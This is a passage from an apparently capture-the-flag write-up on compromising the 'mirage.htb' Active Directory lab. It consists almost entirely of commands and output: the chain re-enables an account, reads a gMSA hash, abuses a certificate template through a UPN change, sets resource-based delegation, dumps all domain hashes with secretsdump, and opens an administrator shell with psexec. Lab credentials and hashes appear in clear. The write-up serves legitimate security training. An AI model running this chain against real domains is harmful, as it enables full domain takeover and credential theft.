gEFBQcDBAYIKwYBBQUHAwIwKwYDVR0RBCQwIqAgBgorBgEEAYI3FAIDoBIMEERDMDEkQG1pcmFnZS5odGIwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEEAYI3GQIBoDAELlMtMS01LTIxLTIxMjcxNjM0NzEtMzgyNDcyMTgzNC0yNTY4MzY1MTA5LTExMDkwRAYJKoZIhvcNAQkPBDcwNTAOBggqhkiG9w0DAgICAIAwDgYIKoZIhvcNAwQCAgCAMAcGBSsOAwIHMAoGCCqGSIb3DQMHMA0GCSqGSIb3DQEBCwUAA4IBAQAN/MbFMAk0eiSGFbflNjB8QlvjLr9deR/HR1TKN9MwyR0eRAf0eY34AbKJePFACX5pkOMCe6rEEdSdu10tuINckT7OafOXAl8AoreIVtX6/Nrf/6beh96Wqcqmn8quWWIOyg/5zr1YZ+C6w/lFs6WqckX4FJRwNi0V21ka7Ulg9dirpifB3k0mQkQHU7c8wVY8eHTJXIJPXQX936cKdbVl94x9o/Or1tEFAq7zTklhuIixBq5NQGJaeqJPDOY2ySiYX07zvXaP+UITffanXuncVjC95mDNLioT79EHveWyjYgyp/3fTId722jI6/UuvgFtCpzyh3ea+k08SfMJAHDH; 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
userPrincipalName: mark.bbond@mirage.htb
whenChanged: 2025-11-29 22:02:00+00:00
whenCreated: 2025-05-02 08:36:23+00:00

bloodyAD --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' -k remove uac javier.mmarshall -f ACCOUNTDISABLE
[+] ['ACCOUNTDISABLE'] property flags removed from javier.mmarshall's userAccountControl

bloodyAD --host dc01.mirage.htb -d mirage.htb -u mark.bbond -p '1day@atime' -k set object javier.mmarshall logonHours -v //////////////////////////// --b64
[!] Attribute encoding not supported for logonHours with bytes attribute type, using raw mode
[+] javier.mmarshall's logonHours has been updated

nxc ldap 10.10.11.78 -u javier.mmarshall -p 'Password!' -k
LDAP        10.10.11.78     389    DC01             [*] None (name:DC01) (domain:mirage.htb) (signing:None) (channel binding:Never) (NTLM:False)
LDAP        10.10.11.78     389    DC01             [+] mirage.htb\javier.mmarshall:Password!

getTGT.py 'mirage.htb/javier.mmarshall:Password!'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in javier.mmarshall.ccache

nxc ldap 10.10.11.78 -u javier.mmarshall -p 'Password!' -k --gmsa
LDAP        10.10.11.78     389    DC01             [*] None (name:DC01) (domain:mirage.htb) (signing:None) (channel binding:Never) (NTLM:False)
LDAP        10.10.11.78     389    DC01             [+] mirage.htb\javier.mmarshall:Password! 
LDAP        10.10.11.78     389    DC01             [*] Getting GMSA Passwords
LDAP        10.10.11.78     389    DC01             Account: Mirage-Service$      NTLM: edb5e64a04fe919e5c3fa6bfbf3c54d9     PrincipalsAllowedToReadPassword: javier.mmarshall

Username: Mirage-Service$
Password: edb5e64a04fe919e5c3fa6bfbf3c54d9

getTGT.py -hashes ':edb5e64a04fe919e5c3fa6bfbf3c54d9' 'mirage.htb/mirage-service$'
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in mirage-service$.ccache

nxc ldap 10.10.11.78 -u nathan.aadam -p '3edc#EDC3' --bloodhound --dns-server 10.10.11.78 -c all -k
LDAP        10.10.11.78     389    DC01             [*] None (name:DC01) (domain:mirage.htb) (signing:None) (channel binding:Never) (NTLM:False)
LDAP        10.10.11.78     389    DC01             [+] mirage.htb\nathan.aadam:3edc#EDC3 
LDAP        10.10.11.78     389    DC01             Resolved collection methods: session, acl, localadmin, group, objectprops, container, rdp, psremote, trusts, dcom
LDAP        10.10.11.78     389    DC01             Using kerberos auth without ccache, getting TGT
LDAP        10.10.11.78     389    DC01             Done in 0M 42S
LDAP        10.10.11.78     389    DC01             Compressing output into /home/arch/.nxc/logs/DC01_10.10.11.78_2025-11-29_232046_bloodhound.zip

certipy req -u mark.bbond@mirage.htb -p '1day@atime' -k -dc-ip 10.10.11.78 -target dc01.mirage.htb -ca mirage-DC01-CA -template 'User'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] KRB5CCNAME environment variable not set
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Request ID is 14
[*] Successfully requested certificate
[*] Got certificate with UPN 'dc01$@mirage.htb'
[*] Certificate object SID is 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Saving certificate and private key to 'dc01.pfx'
File 'dc01.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'dc01.pfx'

KRB5CCNAME=mirage-service\$.ccache bloodyAD -k -d mirage.htb -H dc01.mirage.htb set object mark.bbond userPrincipalName -v 'melvin'
[+] mark.bbond's userPrincipalName has been updated

certipy auth -pfx dc01.pfx -dc-ip 10.10.11.78 -ldap-shell
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'dc01$@mirage.htb'
[*]     Security Extension SID: 'S-1-5-21-2127163471-3824721834-2568365109-1109'
[*] Connecting to 'ldaps://10.10.11.78:636'
[*] Authenticated to '10.10.11.78' as: 'u:MIRAGE\\DC01$'
Type help for list of commands

# set_rbcd dc01$ mirage-service$
Found Target DN: CN=DC01,OU=Domain Controllers,DC=mirage,DC=htb
Target SID: S-1-5-21-2127163471-3824721834-2568365109-1000

Found Grantee DN: CN=Mirage-Service,CN=Managed Service Accounts,DC=mirage,DC=htb
Grantee SID: S-1-5-21-2127163471-3824721834-2568365109-1112
Delegation rights modified successfully!
mirage-service$ can now impersonate users on dc01$ via S4U2Proxy

KRB5CCNAME=mirage-service\$.ccache getST.py -spn 'http/dc01.mirage.htb' -impersonate dc01$ 'mirage.htb/mirage-service' -no-pass
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating dc01$
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in dc01$@http_dc01.mirage.htb@MIRAGE.HTB.ccache

KRB5CCNAME=dc01\$\@http_dc01.mirage.htb\@MIRAGE.HTB.ccache secretsdump.py -no-pass -k dc01.mirage.htb -just-dc-ntlm
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
mirage.htb\Administrator:500:aad3b435b51404eeaad3b435b51404ee:7be6d4f3c2b9c0e3560f5a29eeb1afb3:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1adcc3d4a7f007ca8ab8a3a671a66127:::
mirage.htb\Dev_Account_A:1104:aad3b435b51404eeaad3b435b51404ee:3db621dd880ebe4d22351480176dba13:::
mirage.htb\Dev_Account_B:1105:aad3b435b51404eeaad3b435b51404ee:fd1a971892bfd046fc5dd9fb8a5db0b3:::
mirage.htb\david.jjackson:1107:aad3b435b51404eeaad3b435b51404ee:ce781520ff23cdfe2a6f7d274c6447f8:::
mirage.htb\javier.mmarshall:1108:aad3b435b51404eeaad3b435b51404ee:694fba7016ea1abd4f36d188b3983d84:::
melvin\mark.bbond:1109:aad3b435b51404eeaad3b435b51404ee:8fe1f7f9e9148b3bdeb368f9ff7645eb:::
mirage.htb\nathan.aadam:1110:aad3b435b51404eeaad3b435b51404ee:1cdd3c6d19586fd3a8120b89571a04eb:::
mirage.htb\svc_mirage:2604:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:b5b26ce83b5ad77439042fbf9246c86c:::
Mirage-Service$:1112:aad3b435b51404eeaad3b435b51404ee:edb5e64a04fe919e5c3fa6bfbf3c54d9:::
[*] Cleaning up...

psexec.py -k -hashes :7be6d4f3c2b9c0e3560f5a29eeb1afb3 mirage.htb/administrator@dc01.mirage.htb
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Requesting shares on dc01.mirage.htb.....
[*] Found writable share ADMIN$
[*] Uploading file DLLJYYRW.exe
[*] Opening SVCManager on dc01.mirage.htb.....
[*] Creating service vnco on dc01.mirage.htb.....
[*] Starting service vnco.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.20348.3807]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd \users\administrator\desktop
C:\Users\Administrator\Desktop> type root.txt

Root flag

17e6************************2561

PreviousManage NextOutbound

Last updated 2 months ago

hashtagUser flag

hashtagRoot flag

User flag

Root flag